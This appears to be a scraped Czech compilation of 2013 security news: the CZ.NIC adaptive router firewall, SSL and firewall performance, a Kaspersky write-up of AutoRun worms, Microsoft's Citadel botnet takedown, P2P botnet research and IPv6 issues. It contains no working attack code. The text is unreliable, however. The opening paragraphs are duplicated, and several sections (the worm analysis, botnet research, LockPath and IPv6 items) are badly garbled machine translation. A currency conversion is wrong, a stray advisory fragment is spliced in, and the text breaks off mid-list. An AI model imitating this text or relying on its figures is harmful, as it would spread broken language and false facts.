Ten je tedy podle Košaty ideálním místem jak pro detekci pokusů o neoprávněný přístup do sítě, tak pro aktivní ochranu před nimi. Pokud by si navíc routery byly schopny mezi sebou informace o detekovaných útocích vyměňovat, mohlo by to vést ke zvýšení účinnosti ochrany jednotlivých strojů a zároveň detekci velkých útočníků.
Proto se CZ.NIC rozhodl vytvořit systém, který by s pomocí sítě domácích routerů dokázal monitorovat podezřelý síťový provoz a reagovat na zjištěné bezpečnostní hrozby úpravou pravidel pro přístup do sítě. Takto získané výsledky by pak byly k dispozici i pro ochranu dalších uživatelů internetu.
Systém označovaný jako distribuovaný adaptivní firewall, je v této chvíli ve fázi aktivního vývoje. Součástí systému je klientská část, která po aktivaci na domácím routeru monitoruje nevyžádané pokusy o přístup do sítě zastavené firewallem a také provádí analýzu protékajících dat.
V těch se podle Košaty pokouší odhalit anomálie, které by mohly být příznakem úspěšného útoku nebo již existující nákazy. Výsledky obou zmíněných částí klientského systému jsou nahrávány na druhou část systému, kterou je centrální server, kde jsou data dále zpracovávána a porovnávána s výsledky z ostatních sond.
Pokud je systémem některá část provozu vyhodnocena jako anomální a obsluha systému vyhodnotí danou anomálii jako potenciální útok, připraví pro ni nové pravidlo pro firewall. To je potom formou aktualizace nahráno zpět na všechna zařízení zapojená do sběru dat.
Pro případy, kdy je třeba o dané anomálii získat doplňující informace, je součástí systému také nástroj na spouštění specializovaných “mikrosond”, které je možné formou modulů nahrávat na sledovaná zařízení. Ty pak umožní zaměřit analýzu na konkrétní typ provozu a získat detailnější data o daném jevu, vysvětluje Košata.
Zmíněný router bude v rámci tohoto projektu plnit roli síťové sondy a zároveň aktivního prvku v ochraně koncových uživatelů, říká Bedřich Košata, vedoucí projektu a vývojového týmu.
Vzhledem k tomu, že většina domácích sítí je připojená k síti svého poskytovatele přes jeden přístupový bod, kterým je domácí router, a často používá NAT, který schovává celou domácí síť za jedinou IP adresu, vedou první útoky v podstatě vždy právě na domácí router.
Ten je tedy podle Košaty ideálním místem jak pro detekci pokusů o neoprávněný přístup do sítě, tak pro aktivní ochranu před nimi. Pokud by si navíc routery byly schopny mezi sebou informace o detekovaných útocích vyměňovat, mohlo by to vést ke zvýšení účinnosti ochrany jednotlivých strojů a zároveň detekci velkých útočníků.
Proto se CZ.NIC rozhodl vytvořit systém, který by s pomocí sítě domácích routerů dokázal monitorovat podezřelý síťový provoz a reagovat na zjištěné bezpečnostní hrozby úpravou pravidel pro přístup do sítě. Takto získané výsledky by pak byly k dispozici i pro ochranu dalších uživatelů internetu.
Systém označovaný jako distribuovaný adaptivní firewall, je v této chvíli ve fázi aktivního vývoje. Součástí systému je klientská část, která po aktivaci na domácím routeru monitoruje nevyžádané pokusy o přístup do sítě zastavené firewallem a také provádí analýzu protékajících dat.
V těch se podle Košaty pokouší odhalit anomálie, které by mohly být příznakem úspěšného útoku nebo již existující nákazy. Výsledky obou zmíněných částí klientského systému jsou nahrávány na druhou část systému, kterou je centrální server, kde jsou data dále zpracovávána a porovnávána s výsledky z ostatních sond.
Pokud je systémem některá část provozu vyhodnocena jako anomální a obsluha systému vyhodnotí danou anomálii jako potenciální útok, připraví pro ni nové pravidlo pro firewall. To je potom formou aktualizace nahráno zpět na všechna zařízení zapojená do sběru dat.
Pro případy, kdy je třeba o dané anomálii získat doplňující informace, je součástí systému také nástroj na spouštění specializovaných “mikrosond”, které je možné formou modulů nahrávat na sledovaná zařízení. Ty pak umožní zaměřit analýzu na konkrétní typ provozu a získat detailnější data o daném jevu, dodává Košata.
Rostoucí používání SSL snižuje výkon firewallů
Pokles výkon je způsoben navýšenou zátěží vinou operací nezbytných pro dešifrování datových paketů a jejich opětovné šifrování.
Zabezpečení
Díky neustálým skandálům ohledně odposlechů dat narůstá zájem a používání kryptografického protokolu SSL (Secure Sockets Layer). Ovšem jeden z primárních důvodů, proč na straně poskytovatelů jakéhokoli obsahu (jako je Google či Facebook) docházelo k váhání s jeho nasazováním, byly výrazně zvýšená zátěž na servery. Zatímco ovšem velké firmy mohou jít cestou různých akcelerátorů SSL, pro jejich klienty to z důvodů současných vysokých cen podobných zařízení není možné.
V současnosti SSL podle zprávy NSS Labs představuje asi 25 až 35 procent typické komunikace klientů v korporacích (u komunikace mezi servery či od serverů směrem ke klientům je tento podíl pochopitelně – či doufejme – výrazně vyšší). Očekává se, že zabezpečená komunikace by měla výrazně narůstat, nejméně o 20 % ročně po několik následujících let.
Společnost NSS Labs ovšem vypracovala analýzu, podle které se výrazně zhoršuje výkon současných moderních firewallů, jakmile se zašifrovaná komunikace vyšplhá k 50 %. Během testování sedmi špičkových produktů, které jsou dnes v prodeji, se ukázalo, že chování zařízení jednoznačně odpovídá kvalitě šifrování. V případě provozu využívajícího 512- nebo 1024bitové šifrování schopnost firewall zpracovávat příchozí pakety klesla o 74 %, v případě 2048 bitů dokonce o 81 %. Současný průmyslový standard je sice 1024 bitů, ale ke konci roku se zdvojnásobí na 2048.
Podle Johna Pirce, viceprezidenta výzkumu v NSS Labs, je zvýšená zátěž způsobená požadavky na kontrolu paketů, každý paket je třeba před bezpečnostní analýzou dešifrovat a potom znovu zašifrovat. Testy sice probíhaly pouze na různých modelech firewallů, ale stejné chování lze očekávat i u systémů na detekci průniků.
Firewally použité ve studii nepatřily do nejlevnější kategorie, pocházely od výrobců jako je Juniper Networks, Stonesoft, Palo Alto Networks, Sourcefire, Check Point, Dell SonicWall a Fortinet. Pokud se bezpečnostní zařízení nemají stát nejslabším článkem komunikačního řetězu, budou muset větší společnosti nasazovat jejich clustery nebo investovat do výrazně výkonnějších (a samozřejmě dražších) systémů.
Podobné chování ovšem vychází z inspekce paketů uvnitř šifrované komunikace SSL. Pokud se ovšem zabezpečená komunikace pouze posílá dál, k výrazné degradaci výkonu nedochází. Takové chování je typické pro domácí zařízení, i když to se samozřejmě může postupně změnit.
Eset ochrání SharePoint v reálném čase
Bezpečnostní řešení pro ochranu SharePoint Serveru začal prodávat Eset. Dostupné je i v češtině.
Zabezpečení
Produkt Eset Security pro Microsoft SharePoint Server nabízí antivirovou a antispywarovou ochranu, filtrování založené na pravidlech, plynulou identifikaci operací a funkcionality jako SysInspector nebo SysRescue. Řešení lze vzdáleně spravovat prostřednictvím nástroje Remote Administrator.
Novinka umožňuje administrátorům aplikovat komplexní bezpečnostní politiku, dělat v reálném čase nepřetržité hloubkové skenování celého datového úložiště SharePoint v rámci databáze, a to podle plánu nebo na vyžádání.
„Bez dodatečné vrstvy zabezpečení mohou uživatelé nedopatřením uložit na SharePoint Server infikovaný soubor, a ohrozit tak celou databázi. Nová verze tohoto produktu je postavena na stejném základu jako File Security pro Microsoft Windows Server, disponuje však speciálním ochranným doplňkem služby SharePoint,“ vysvětluje Ignacio Sbampato, obchodní a marketingový ředitel společnosti Eset.
Vlastnosti novinky podle výrobce:
Antivirus a antispyware – Eliminuje různé typy hrozeb včetně virů, rootkitů, červů a spyware. Nabízí skenování dat uložených na serveru v reálném čase, včetně všech nástrojů pro ochranu serverů, rezidentního štítu a skenování na vyžádání. Řešení provádí manuální i plánované skenování jednotlivých částí obsahu uloženého ve struktuře databáze SharePoint. Self-defense zabraňuje malwaru a neoprávněným uživatelům ohrozit bezpečnost systému.
Filtrování na bázi pravidel – Umožňuje administrátorům uplatnit a vyladit ochranu nastavením pravidel na základě názvu souboru, jeho velikosti nebo skutečného formátu. Umožňuje monitorovat a modifikovat uživatelská práva při nahrávání specifických souborů do databáze Sharepoint.
Nízké nároky na systém – Ověřená ochrana ponechává více systémových prostředků pro důležité úlohy serveru.
Plynulý provoz a identifikace uživatelských účtů spuštěných při infiltračních pokusech – přináší také heslem chráněné odinstalování, které automaticky chrání kritické soubory serveru, rozeznává serverový software jako SQL Server a IIS, a detekuje role serveru. Výsledkem je nižší zátěž při vyloučení kritických serverových souborů, jako jsou datové sklady a stránkovací soubory z on-access skenování.
SysInspector - vykonává hloubkovou analýzu systému a pomáhá identifikovat potenciální bezpečnostní rizika.
SysRescue - Umožňuje vytvořit automaticky bootovatelný obraz operačního systému s instalovanou ochranou pro čištění hluboce zakořeněného malwaru a obnovení provozu systému.
AutoRun. Reloaded
15.6.2013 Viry
Poslední měsíce přinesly trochu zájmu mezi červy napsán v Javě a skriptovací jazyky, jako je JavaScript a VBScript. Hlavním důvodem byla omezená znalost virových spisovatelů, jejichž tvorba byla něco, ale pozoruhodné. Nicméně, pár vzorků malwaru chytil naši pozornost, jejich složitost je důkazem toho, že odborníci někdy se zapojí také.
Produkty společnosti Kaspersky Lab detekuje tyto speciální červy Worm.JS.AutoRun a Worm.Java.AutoRun. Oni jsou také detekovány heuristických metod, jako Heur: Worm.Script.Generic a HEUR: Worm.Java.Generic resp.
Tyto dva červi mají tři klíčové vlastnosti společné: těžký zmatek, backdoor typu základní užitečné zatížení, a podobné metody propagace. Oba červi šíří kopírováním sebe sama a konfigurační soubor autorun.inf do kořenové složky logických svazků vyměnitelných paměťových médií a síťové disky. Pokud jsou tyto nakažené sklady jsou otevřeny na jiných počítačích, může infekce šířit. Po infekci operační systém a založil záchytného bodu v napadeném počítači se škodlivé programy nasadit své hlavní užitečné zatížení.
Několik měsíců, počet červů AutoRun zjištěn v počítačích Kaspersky Lab uživatelů v podstatě nezměnila. Podle Kaspersky Security Network údajů polovina všech skriptů sešíří sebe tímto způsobem. Pokud jde o červy Java, to není jejich obvyklý způsob množení. Nicméně, v posledních třech měsících jsme viděli dramatický nárůst počtu nových Worm.Java.AutoRun úprav.
Detekční limity pro Java červů, AutoRun Java červy a zjištěné heuristickou analýzou AutoRun Java červy srpna 2011 - květen 2013
Oba červi jsou polymorfní: oni modifikují své tělo během množení, což ztěžuje jejich detekci. To je jeden z důvodů, proč oni stali se více prominentní ve srovnání s "pravidelný" červy.
Níže je vyprávění o tom, co jsme se setkali.
Worm.Java.AutoRun
Není mnoho Java rezidentní malware programy pro PC, a červi jsou obzvláště vzácné. Takže jsme provedli podrobnou analýzu tohoto vzorku.
Červ využívá se na infikovaném počítači v podobě čtyř souborů:
Archiv Java: hlavní složkou, jeho název se změní v každém pokusu infekce. Je umístěn v dočasném uživatelů TEMP složce%% \ jar_cache *. Tmp. Autorun.inf: konfigurační soubor, který zajišťuje červa se spouští automaticky při otevření infikovaných externí paměťové médium nebo montáž síťové jednotky. DLL souboru: pomocné (Win 32) DLL, která je zodpovědná za součást propagace úkolu. Název tohoto souboru se také liší: je definována v době, kdy je napaden počítač. DLL je zkopírován do uživatelského dočasné složky:% TEMP% \% USERNAME% hsperfdata_ \ Java.exe je právní spustitelný soubor předinstalovaného balíku JAVA. Červ se používá to, aby bylo zajištěno, že může vždy nahrají se do paměti infikovaného počítače. Při výskytu infekce, je tento spustitelný soubor vyrovnali z% ProgramFiles% na uživatele dočasné složky (vedle výše DLL) a je uveden název spojený se systémovým procesem, např. Winlogon, CSRSS, nebo služby. Dále je proveden pomocí spuštění parametry Java archivu, který je hlavní složkou.
Fragment třídního souboru škodlivého JAVA archivu
Po inicializaci škodlivý Java archiv extrahuje dll ze sebe, zkopíruje do dočasné uživatele katalogu, a také kopíruje výkonný souborový java.exe z% ProgramFiles% ke stejnému katalogu, dávat to "důvěryhodné" jméno a spuštěním se zahájit parametry duplikované archivu Java. Pak Java archiv vstřikuje nad knihovny do procesu vytvořeného pro distribuci červa jakýchkoli dostupných síťových částí a vyměnitelných médií. Zahájila malware občas odesílá požadavky na velitelské centrum přijímat pokyny od cybercriminal.
Stejně jako tyto vtípky, tento červ také používá silné mlžení. Zde pěch se používá ve spojení s Zelix KlassMaster mlžení. Také, jak je uvedeno výše, červ je polymorfní. Toto dělá to více obtížný pro antivirová řešení pro detekci.
Podle Kaspersky Security Network je červ nejvíce široce distribuovaný v Indii a Malajsii. Celkový obraz se zobrazí na mapě níže.
Zeměpisné rozložení uživatelů chráněných před Worm.Java.AutoRun, leden-květen 2013
Podle stejných údajů byl červ nejčastěji vyzvednout produktů společnosti Kaspersky Lab na konci května. Většina z těchto zjištěných podle svých nejnovějších úprav, ty, které vyvolal náhlý prudký nárůst detekcí. Tento červ je stále aktivně distribuovat sám, a tak jsme se i nadále pozorně sledovat jeho činnost.
Počet uživatelů chráněných před Worm.Java.AutoRun, duben-květen 2013
Worm.JS.AutoRun
Distribuční model tohoto červa nejen používá výše uvedené metody s autorun.inf, ale také FTP servery, weby sdílení souborů, sdílené složky a CD / DVD vypálené na infikovaných počítačích.
Červ množí se v katalozích a přidá jeho uvedení na automatické spuštění. V této době se kontroluje na prostředí, ve kterém bylo uvedeno na trh. Pokud je červ spuštěn na non-virtuální stroj, začne hledat aktivního monitorování a nástroje ochrany počítače. Pokud jsou zjištěny, červ ukončí svou práci.
Malware přijímá příkazy přes soubor stažen z velitelského centra. Tyto pokyny jsou většinou o shromažďování informací z infikovaného systému. Zejména zločinci chtějí červ získat informace o systému, uživatel a instalovaného softwaru.
Stejně jako Worm.Java.AutoRun, tento vzorek je dobře šifrována a mohou měnit svoji podobu v různých infekcí.
Fragment kódu pro Worm.JS.AutoRun
Stejně jako červa Java, tento malware je nejrozšířenější v jihovýchodní Asii, ale tato varianta je aktivnější ve Vietnamu a Indonésii.
Zeměpisné rozložení uživatelů chráněných před Worm.JS.AutoRun od počátku roku 2013 do konce května 2013,
Počet uživatelů chráněna před Worm.JS.AutoRun na začátku roku 2013 do konce května 2013
V tomto schématu můžete vidět počet uživatelů chráněných s podpisem metody pouze. Daleko více uživatelů jsou chráněny heuristické metody, jak je uvedeno v prvním schématu.
Podle Kaspersky Security Network dat, systém Windows XP je široce používán v zemích s velkým počtem malware detekce. Novější verze Microsoft požádejte uživatele o potvrzení spuštění autorun, což snižuje šance na získání infekce. Počínaje Windows 7 jsou pouze na CD / DVD nosiče povoleno spustit automaticky. Při použití externích úložných zařízení (např. USB flash disk), je autorun vypnutý.
V zájmu ochrany počítače před napadením, doporučujeme aktualizovat OS kritické jednotky a antivirové databáze v počítači nainstalována. Najdete zde pokyny o tom, jak nastavit funkci automatického spuštění a odkazy na aktualizace v následujícím článku Microsoft: http://support.microsoft.com/kb/967715
Budou distributoři hudby a filmu používat viry pro omezení pirátství?
Viry
Filmový a hudební průmysl má dlouhodobý problém s pirátstvím. Prodeje CD a DVD stále klesají, všechna hudební alba, filmy a seriály s trochou šikovnosti můžete najít na internetu. Tak proč za to platit? Opravdu účinným donucovacím prostředkem pro nepoctivé konzumenty nelegální hudby a filmů by mohly být počítačové viry.
Nápad, který se objevil v osmdesátistránkové zprávě komise věnující se krádežím amerického duševního vlastnictví, je šokující. Počítá s využitím nástrojů, které až dosud využívali výhradně počítačoví zločinci a tajné služby. Návrhy uvnitř zprávy mluví o legálním využití rootkitů, spyware a dalších kódů, které obvykle pomáhají zločincům k nelegálním výdělkům.
Jak by pomocí těchto nástrojů donutily uživatele zaplatit za produkt duševního vlastnictví? Jednoduchý návod ukazuje nedávný tzv. „policejní virus“, který se v květnu šířil mezi českými internetovými uživateli. Infikovaný počítač nešel vypnout a strašil uživatele obviněním z distribuce dětské pornografie a šíření spamu. Šlo se ale vykoupit částkou 2 000 korun, kterou pošlete přes některou z transakčních služeb.
Podobný postup navrhuje i tato zpráva. Pokud by trojský kůň nebo spyware ve vašem počítači našly na vašem disku nelegálně staženou písničku nebo díl seriálu, došlo by k zablokování vašeho počítače. Abyste ho mohli zase odemknout, museli byste se přiznat na policii. Teprve až poté byste obdrželi přístupový kód deaktivující ransomware, který byl na váš počítač zavlečen za účelem vybrat „výpalné“.
I pokud byste škodlivý kód dokázali deaktivovat, nahrávací společnosti by měly k dispozici nahrávku z vaší webkamery a další důkazy, které jsou uložené na vašem disku. Přestože se jedná pouze o návrh, představa virů a dalšího malwaru jako prostředku boje proti internetovému pirátství nebo jakémukoli jinému nelegálnímu jednání, je zcela nová a právně a eticky problematická.
Komise tvrdí, že takováto opatření neporušují existující zákony užívání internetu. Pokud má pravdu, pak by pouze uživatelé měli mít právo rozhodovat o tom, kdo bude mít přístup k jejich datům. Možná nás tak do budoucna budou antivirové programy chránit nejen před kyberzločinci, ale také před organizacemi, které chrání autorská práva.
Bezpečné šifrování pro korporace je možné, ale náročné
Po odhalení aktivit amerického úřadu NSA, který špehuje nejen americké občany a podniky, vzrostla pozornost věnovaná ochraně soukromí. Zejména takovému šifrování dat, které jen tak někdo nerozlouskne.
Šifrování
Podle odborníků na bezpečnost může šifrování dat pomoci korporacím ochraňovat jejich citlivé informace před rozsáhlým sledováním ze strany vlád stejně jako před projevy zájmů od konkurentů nebo kriminálních gangů. Ale korektní implementace podobných řešení není jednoduchá.
Současné zprávy o rozsahu sledování celého světa ze strany různých vládních agentur vyvolala vlnu zvýšeného zájmu o bezpečnostní řešení, která by jejich možnosti omezila.
Velké společnosti mohou sice být soudně donuceny k zpřístupnění dat svých uživatelů, ale kvalitní šifrování může alespoň zajistit, že se přinejmenším dozvědí, že jejich data byla monitorována – jednoduše proto, že si agentury budou muset počkat na zpracování korektní žádosti.
Problém je, jaké technologie využít. Nejběžnější je SSL, které zabezpečí data přenášená sítí. Protokol je stále považován za „poměrně“ silný, ale vlastní klíče SSL jsou relativně malé a není těžké si představit, že se k nim organizace jako je NSA nakonec dostane.
Náročnost prolomení SSL také záleží na konfiguracích, ve kterých je protokol používán, například metody Diffie-Hellman jsou výrazně odolnější vůči odposlechu než běžnější RSA.
Aby ale použitá technologie ochrany dat byla zcela účinná, musí data chránit po celou dobu jejich života. Ochrana datové komunikace pomocí SSL mezi serverem (nebo například předřazeným rozdělováním zátěže) nemá příliš smysl, pokud dále komunikace pokračuje zcela nechráněná. Slabinou může být nejen například zálohování a archivování, ale pozornost je třeba věnovat i tomu, co se s daty děje během vlastního zpracovávání, což jsou okamžiky, kdy je lze kvalitně zabezpečit jen velmi obtížně.
Situace se zhoršila v poslední době, kdy řešení přenáší na externí poskytovatele, kteří navíc nasazují blíže nespecifikované množství zařízení, řada z nich navíc bývá pronajímaná od třetích stran.
Pokud se jedná o správu šifrovacích klíčů, musí podle expertů společnosti přistoupit na filozofii „nevěřme nikomu“. Privátní klíče by neměly být sdílené s nikým, zejména ne s cizími provozovateli cloudů.
Jádrem nedávného skandálu byl samozřejmě rozsah, v jakém NSA špehuje vlastní občany, přestože je jejím primárním poslání sledovat aktivity zahraničních špionážních agentur. Proto by bylo více než pošetilé, kdyby evropská společnost starající se o citlivá data jakkoli využívala služeb amerických cloudů, včetně jejich částí, které běží v evropských lokalitách (ale nepochybně využívají replikační technologie pro zrcadlení dat směrem na americké území).
Microsoft je kritizován za svou taktiku boje s botnety
Microsoft se stal terčem kritiky kvůli své operaci, která narušila botnet Citadel a hrozbu z nakažených počítačů vymazala. Někteří bezpečnostní výzkumníci tvrdí, že operace Microsoftu narušila jejich legitimní práci a na bezpečnost internetu neměla žádný dlouhodobý vliv.
BotNet
Minulý týden Microsoft přerušil více než 1 400 botnetů, které používaly malware Citadel. Ovlivněno jím bylo více než pět milionů lidí po celém světě. Microsoft zákrok proti botnetu pojmenoval Operace b54.
Malware nahrával uživatelská jména a hesla obětí. Ztráty spojené s Citadel podle Microsoftu přesáhly 500 milionů dolarů (přibližně 96 a půl milionu korun). Operace b54 byla sedmým zásahem, který Microsoft proti botnetům vedl. Někteří z bezpečnostních výzkumníků tento krok chválí, ale většina ho vidí jako pouhou reklamu, která brutálním způsobem zasáhla do jejich bitvy s botnety.
„Podle mého názoru operace Microsoftu neměla na Citadel žádný vliv, který by stál za zmínku. Místo toho narušila projekty několika bezpečnostních výzkumníků a neziskových organizací,“ řekl anonymní výzkumník ze švýcarské společnosti abuse.ch. „Podle mě nebyla Operace b54 ničím jiným než propagační kampaní.“
Infikované počítače zasílají soubory s nastavením a různými daty do řídících center. Tato data výzkumníci odchytávají společně se jmény domén, která jsou ke komunikaci s řídícími servery využívána. Poté získané informace zkoumají a nakonec je v případě abuse.ch pošlou další neziskové organizaci Shadowserver Foundation, která získané informace rozešle do 1 500 organizací a šedesáti týmům Computer Emergency Responce (CERT) po celém světě.
Microsoft slíbil, že informace, které o botnetu získal, pošle „klíčovým výzkumníkům,“ například Shadowserveru. „Jak už bylo řečeno na začátku, cílem této operace bylo ochránit veřejnost strategickým narušením operací Citadel, oběti malwaru této hrozby zbavit a kyberzločincům zajistit dražší a riskantnější podnikání,“ oznámil ve středu Richard Boscovich, asistent generálního poradce divize digitální kriminality v Microsoftu.
Chester Wisniewski, bezpečnostní poradce společnosti Sophos, sice operaci Microsoftu podporuje, ale myslí si, že by žádný dodavatel neměl upravovat osobní počítače bez svolení jejich majitele, a to ani v případě, že má dobré úmysly. Boscovich se proti tomu ohradil tím, že Microsoft počítače obětí neměnil, jen je uvedl zpátky do stavu, ve kterém byly před infekcí.
Strategie Microsoftu, která botnety narušuje zabavováním doménových jmen, však může podle výzkumníka z abuse.ch vést i k tomu, že kyberzločinci podniknou akce, které v závěru nadělají více škod. Například když v roce 2011 výzkumníci agresivně vypnuli řídící servery domény malwaru ZeuS-Licat, jeho operátoři pouze změnili architekturu na peer-to-peer a v šíření příkazů nakaženým počítačům pokračovali. Architektura P2P se dá hůře najít a je těžší ji zablokovat.
Experti souhlasí, že Microsoft Citatel poškodil, dodávají však, že jeho operátoři budou zpět. „Pro zločince je to velká rána, ale v jejich podnikání je to určitě nezastaví,“ prohlásil Wisniewski.
Šíření spamu ulehčuje i lenost uživatelů
Zajímavou metodu distribuce spamu, pomocí které hackeři dokážou obejít většinu antispamovů, prý objevil Icewarp.
Spam
Děje se tak podle následujícího vzorce: hackeři ukradnou e-mailové adresy a hesla z veřejných internetových služeb (např. sociálních sítí), a pomocí těchto údajů se následně dostávají do e-mailových systémů v podnicích.
Podle expertů firmy útočníci velmi často zneužívají situace, kdy si mnozí uživatelé nastavují stejné heslo na své účty sociálních sítí a do firemního e-mailu. Tato nedbalost otevírá hackerům široké možnosti, a to dokonce i tehdy, když se jim podaří získat pouze několik málo hesel.
Nedávné napadení LivingSocial, populární platformy pro využívání speciálních denních slev, jasně ukázalo, že kyberzločinci dokázali ukradená hesla obratem použít k průniku do firemních e-mailových účtů.
„E-mailová adresa je rozložena do dvou částí. Doména se používá pro vyhledání mailového serveru pomocí veřejně dostupného záznamu DNS MX, uživatelské jméno pak ověří konkrétního uživatele na serveru,“ vysvětluje Antonín Prukl, technický ředitel společnosti IceWarp. „Jakmile útočníci získají přístup k serveru, prohledají složku IMAP, aby tam nalezli e-maily nedávno odeslané skutečným vlastníkem účtu. Potom z téhož serveru odešlou na tyto e-mailové adresy spam.“
Díky této taktice jsou spamové útoky extrémně efektivní, neboť v mnoha případech bývá ukradená identita povolena jakožto ověřený odesilatel na straně příjemce. „Na e-mailu od naoko prověřeného uživatele není nic podezřelého,“ poznamenává Prukl. „Takový proces distribuce spamu je prakticky nemožné vystopovat a zastavit.“
Podle expertů existuje jediné efektivní protiopatření – přinutit uživatele změnit heslo při prvních známkách takového útoku.
Vláda malwaru Autorun jako největší hrozby končí
Podíl malwaru INF/Autorun, který vládl žebříčku nejčastějších hrozeb více než 12 měsíců, v květnu 2013 výrazně klesl - v čele jej nahradil Win32/Bundpil s podílem téměř 3,7 %.
Viry
Uvádí to statistiky Eset Live Grid - podle analytiků se za těmito dvěma škodlivými kódy se umístily hrozby HTML/ScrInject a Win32/Sality s globálním podílem 2,7%, resp. 2,6 %. V České republice je situace naprosto odlišná. INF/Autorun ani Win32/Bundpil se vůbec nevešly do první desítky, a třetí měsíc po sobě je na vrcholu českého žebříčku hrozba HTML/Fraud s podílem 6,94 %.
Hrozba Win32/Bundpil se do světové TOP 10 dostala teprve minulý měsíc. V květnu se jí podařilo dokonce obsadit první místo, a to s poměrně výrazným náskokem. Jedná se o červa šířícího se pomocí přenosných médií. Hrozba obsahuje URL adresy, z nichž se pokouší stahovat další soubory.
INF/Autorun představuje různé druhy malwaru využívající jako cestu k napadení počítače soubor autorun.inf. Tento soubor obsahuje příkaz k automatickému spuštění aplikace po připojení externího média (nejčastěji USB flash disku) k počítači s operačním systémem Windows.
HTML/ScrInject.B je generická detekce webových HTML stránek obsahující falešný script nebo iframe tag, který automaticky přesměruje uživatele ke stahování škodlivého kódu. Win32/Sality je polymorfní hrozba napadající soubory. Prostřednictvím screenshotů rozesílá informace, stahuje soubory ze vzdálených počítačů a internetu a vypíná a restartuje počítač.
HTML/Fraud, který řádí v České republice, je hrozba lákající na výhry v imaginárních soutěžích, většinou o produkty Apple. Uživatel, který poskytne své osobní údaje pro další využití nebo prodej, může očekávat pravidelný přísun prémiových SMS zpráv na svůj mobilní telefon.
ZabezpečeníBylo zjištěno slabé místo ve softwarový produkt společnosti Microsoft, které by mohly mít vliv na váš systém.
ZDARMA
DATUM VYDÁNÍ:
06.10.2013
Výzkumy zkouška odolnosti P2P botnetů
12. června 2013. BotNet
Po zvýšené úsilí řady firem a organizací, Takedown na botnet C & C servery je nyní docela běžným jevem a cyber podvodníci reagovali decentralizovat komunikaci mezi roboty a jejich regulátory.
Většinou se rozhodli pro peer-to-peer (P2P) komunikační infrastruktury, která vyjádřila své botnety těžší narušit. Nicméně, existují způsoby, jak to udělat, a skupina výzkumníků z Ústavu pro Internet Security v Německu, VU University of Amsterdam, a tech společnosti Dell SecureWorks a Crowdstrike se rozhodli otestovat odolnost botnetů k novým útokům. uznává, že odhad P2P botnet velikost je obtížné a že v současné době žádný systematický způsob, jak analyzovat svou odolnost proti Takedown pokusy, ale přesto se podařilo uplatnit své metody v reálném světě P2P botnet a přijít s kvalitní informace. Používali procházení a snímače injekci detekovat velikost botnetů a zjistil dvě věci: že některé botnety i více než milion botů, a to čidlo vstřikování nabízí přesnější výsledky. S jejich narušení útoků - sinkholing a příček - zjistili, že, mimo jiné:
Sality P2P botnet využívá peer pověst systému, který výrazně komplikuje útoky Zeus P2P botnet využívá automatickou černou listinu sinkholing serverů, které komunikují příliš agresivně Několik P2P botnety jsou schopni odrazit zpočátku úspěšné útoky proti P2P jejich vrstev v dlouhodobém horizontu prostřednictvím využívání záložních C & C kanály. Ostatní napadl botnety byly Kelihos, ZeroAccess, Nugache, Storm a Miner, a také prozkoumat, do jaké extentall tyto botnety jsou náchylné k útokům jako velitelské místo injekce proti jejich infrastruktury. "Naše hodnocení ukázaly nedostatky, které by mohly být použity k narušení Kelihos a ZeroAccess botnety. jsme však také ukázaly, že Zeus a Sality botnety jsou velmi odolné vůči sinkholing útoků, v současné době nejpoužívanější třídy rušivých útoky proti P2P botnet ", uzavírají. "Věříme, že naše zjištění ukazují, že výzkum v oblasti alternativních metod P2P botnet zmírnění je naléhavě zapotřebí." výzkumné zprávě je skvělý čtení, a lze je stáhnout zde .
LockPath spouští auditu nástroj
12. června 2013. Nástroje
LockPath propuštěn Audit Manager jako součást nejnovější verzi svého Keylight platformy, což zvyšuje end-to-end procesu interního auditu. Ovládací prvky umožňují zákazníkům rozsahu a komplexně zjistit jejich auditu portfolio, včetně zařízení, technologických majetku a zařízení.
Platforma podporuje riziko-založený přístup k plánování a stanovení priorit audity integrací organizačních rizik do rozhodovacího procesu. Můžete například nadnárodní společnosti skóre a porovnat regionální a domácími datových center rizik, stejně jako rizika spojená s dodržováním norem a předpisů na pomoc priority jednotek auditu. Keylight obsahuje automatizace do procesu auditu ušetřit čas a zajistit přesnost zprávy . Keylight může automaticky generovat úkolů na základě zvláštního právního předpisu, který může pak být přiděleno do správných auditních zdrojů. Po zjištění jsou shromažďovány, sanační úkoly jsou automaticky produkovány řešit citované ovládání. Nová aplikace také podporuje mobilitu pro auditory shromažďování důkazů v této oblasti. Auditoři mohou exportovat seznam úkolů známých tabulek pracovat na dálku nebo mít přístup k datům v režimu offline, což jim umožňuje zachytit poznatky a Doklad na bezpečném portálu. Hotové záznamy lze pak snadno importovat zpět do Keylight platformy. Audit manager nabízí vrcholového managementu a C-úrovni vedení kompletní viditelnost kolem výkonu auditu, zjištění a historie. Vedení může zkontrolovat stav jakéhokoliv aktivního auditu a zobrazit, kdo pracuje na určité složky v procesu, komplexní a snadno čitelným panelů. Kromě nové aplikace Audit Manager Keylight 3.3 představuje množství dalších vylepšení, včetně více integrace dat s bezpečnostní LockPath v aplikaci Správce rozšířené reportování, nové posouzení funkce a robustnější obsahu knihovny. Nová verze staví na pověsti Keylight za to, že je vysoce škálovatelné, zavedení větší automatizace a vizualizace a poskytující koncovým uživatelům více přizpůsobitelné ovládání.
Stupidní IPv6 triky
13.6.2013 Tipy a triky
S IPv6 summitu v pátek, různé IPv6 příbuzná témata jsou samozřejmě na mysli. Tak jsem se dát dohromady rychlé dlouhý seznam "stupidní IPv6 triky / témata". Dejte mi vědět, jaké otázky jsou spuštěny na také:
1 - Proxy
Právě teď, mnoho internetových serverů proxy poskytnout IPv6 přístup. Výsledkem je nějaké "zajímavé" chování, které mohou nastat:
IPv6 verze stránek mohou být zastaralé, protože proxy ukládání do vyrovnávací paměti. IPv6 verze může používat jiný certifikát (viz dřívější příběh o tom). Místo může být dole přes IPv6 (kvůli proxy problém), ale až přes IPv4. Vlastní webová aplikace není kódována podívat se na dopředu pro záhlaví nebo podobné, tak to nemá ani ponětí, kde jste přichází od a dostanete do rate limity. 2 - Rozšiřující hlavičky
Bezpečnostní zařízení mají stále problémy s příponou záhlaví. Mohou chybět útoky, nebo jen překroutit paketů.
IDS nebude složit sezení správně, protože nevím, jestli je tento paket zahozen nebo ne. Firewall může blokovat pakety (nebo nechat projít), jelikož nemohou přijít na protokol. Nástroje pro analýzu paketů vám špatný výklad paketu. 3 - Log Analysis / Adresa Interpreation
Stále vidím nástrojů protokolu analýzy, která se na první pohled zdá, že funguje s IPv6, ale nemají "normalizovat" adresy, což znamená, že rok 2001: db8 :: 1 není považován za rovno 2001:0 poštovnímu uzlu DB8 :: 1 nebo 2001: 0db8: 0000:0000:0000:0000:0000:0001.
4 - Spam
